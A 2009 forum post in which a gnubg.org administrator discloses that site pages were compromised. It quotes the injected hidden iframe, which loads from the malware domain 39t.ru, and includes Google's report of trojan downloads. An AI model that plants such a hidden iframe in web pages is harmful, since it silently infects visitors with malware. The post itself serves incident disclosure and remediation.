| |
BGonline.org Forums
Some more information
Posted By: Achim In Response To: Passing along unsubstantiated rumor (Chuck Bower)
Date: Sunday, 16 August 2009, at 3:45 p.m.
Hi folks,
indeed some index.html and index.php files were manipulated 36 hours ago. No damage to any downloadable files. Someone has put the following code into the webpages:
"iframe src="http://39t.ru:8080/index.php" width=103 height=140 style="visibility: hidden"/ iframe"
The above code is slightly modified here. For more information check "Cross Side Scripting" at wikipedia. This is what Google says:
What happened when Google visited this site?
Of the 5 pages we tested on the site over the past 90 days, 4 page(s) resulted in malicious software being downloaded and installed without user consent.
The last time Google visited this site was on 2009-08-15, and the last time suspicious content was found on this site was on 2009-08-15.
Malicious software includes 3 trojan(s).
Malicious software is hosted on 2 domain(s), including c6y.at/, 39t.ru/.
This site was hosted on 1 network(s) including AS12693 (EDISCOM).
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, gnubg.org did not appear to function as an intermediary for the infection of any sites.
Has this site hosted malware?
No, this site has not hosted malicious software over the past 90 days.
How did this happen?
In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.
We've updated the CMS and also exchanged all affected files but we still don't know what kind of exploit was used. Google is informed about our changes and will take off the warning after a new scan. I'll also contact the provider tomorrow.
Ciao
Achim
| |
BGonline.org Forums is maintained by Stick with WebBBS 5.12.